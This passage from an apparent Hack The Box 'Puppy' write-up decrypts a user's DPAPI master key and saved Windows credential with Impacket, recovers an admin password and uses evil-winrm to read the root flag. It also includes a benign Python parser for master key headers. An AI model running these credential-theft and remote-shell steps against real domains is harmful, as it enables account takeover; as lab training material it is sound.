└─# impacket-dpapi masterkey -t puppy.htb/steph.cooper:'ChefSteph2025!'@10.10.11.70 -file 556a2412-1275-4ccf-b721-e6a0b4f90407
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key using rpc call
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
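
To make sense of the [MASTERKEYFILE] fields impacket prints, here is an added Python parser for the fixed header of a DPAPI master key file. It is example code written for this writeup, not impacket's code or anything from the box. The field layout it assumes (version, two reserved DWORDs, the GUID as 36 UTF-16LE characters, two more DWORDs, flags, then four 64-bit section lengths, 128 bytes in all) is taken from the publicly documented master key format, and the naming of the DWORD before Flags as "policy" follows impacket's output. The sample file is constructed: only the header values come from the output above (version 2, lengths 136/104/0/372, the 556a2412-... GUID); the section bodies are filler, not key material. One check the parser makes explicit: 128 + 136 + 104 + 0 + 372 = 740 bytes, exactly the size Get-ChildItem listed for that file. A non-empty DomainKey section is what lets the DC's DPAPI backup key recover the master key for a caller holding the user's credentials (the "Decrypted key using rpc call" path), which is why these files need the same protection as the user's password itself.

```python
"""
Parse the fixed 128-byte header of a Windows DPAPI master key file.

Added example for this writeup; not impacket's code. The field layout is an
assumption based on the publicly documented master key format. The sample
file built below is constructed: header values mirror the impacket output on
this page, section bodies are filler bytes.
"""
import struct

# "<" = little-endian, no padding. 3 DWORDs, 72-byte GUID, 3 DWORDs, 4 QWORDs = 128 bytes.
HEADER_FMT = "<III72sIIIQQQQ"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 128


def parse_masterkey_header(blob: bytes) -> dict:
    """Return the header fields of a master key file as a dict."""
    if len(blob) < HEADER_LEN:
        raise ValueError("file shorter than the 128-byte master key header")
    (version, _r0, _r1, guid_raw, _r2, policy, flags,
     mk_len, bk_len, ch_len, dk_len) = struct.unpack_from(HEADER_FMT, blob, 0)
    return {
        "version": version,
        "guid": guid_raw.decode("utf-16le").rstrip("\x00"),
        "policy": policy,            # impacket's name for this DWORD (assumption)
        "flags": flags,
        "masterkey_len": mk_len,     # section encrypted with the user's password-derived key
        "backupkey_len": bk_len,
        "credhist_len": ch_len,
        "domainkey_len": dk_len,     # section recoverable with the domain backup key
    }


def sections_fit(blob: bytes) -> bool:
    """True when header + the four section lengths exactly equal the file size."""
    h = parse_masterkey_header(blob)
    expected = (HEADER_LEN + h["masterkey_len"] + h["backupkey_len"]
                + h["credhist_len"] + h["domainkey_len"])
    return expected == len(blob)


def has_domain_backup_section(blob: bytes) -> bool:
    """A non-empty DomainKey section means the DC's DPAPI backup key can
    recover this master key for anyone holding the user's credentials."""
    return parse_masterkey_header(blob)["domainkey_len"] > 0


def build_sample_masterkey_file() -> bytes:
    """Constructed sample: header values from steph.cooper's file on this page
    (version 2, lengths 136/104/0/372); section bodies are 0xAA filler."""
    guid = "556a2412-1275-4ccf-b721-e6a0b4f90407".encode("utf-16le")
    assert len(guid) == 72
    lens = (136, 104, 0, 372)
    header = struct.pack(HEADER_FMT, 2, 0, 0, guid, 0, 0, 0, *lens)
    body = b"".join(bytes([0xAA]) * n for n in lens)  # filler, not real key material
    return header + body


if __name__ == "__main__":
    sample = build_sample_masterkey_file()
    print(parse_masterkey_header(sample))
    # 128 + 136 + 104 + 0 + 372 = 740, the size Get-ChildItem showed for this file
    print("size:", len(sample), "sections fit:", sections_fit(sample))
    print("domain backup section present:", has_domain_backup_section(sample))
```

To run it against a real file, read it with `open(path, "rb").read()` and pass the bytes to `parse_masterkey_header` and `sections_fit`; a size mismatch usually means a truncated copy, which is worth knowing before blaming the decryption step.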

┌──(root㉿kali)-[/srv/ftp/incoming]
└─# impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key '0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84'


Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

This gives us the password of steph.cooper_adm; that account is in the admin group, so we can go straight for the flag.

┌──(root㉿kali)-[/myift/bachang/htb/8/1]
└─# evil-winrm -i dc.puppy.htb -u steph.cooper_adm -p FivethChipOnItsWay2025!

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper_adm\Documents> cd ..

*Evil-WinRM* PS C:\Users\steph.cooper_adm\desktop> cd ..
*Evil-WinRM* PS C:\Users\steph.cooper_adm> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


Directory: C:\Users\Administrator\desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/26/2025 7:07 AM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
d78af2****************************
*Evil-WinRM* PS C:\Users\Administrator\desktop>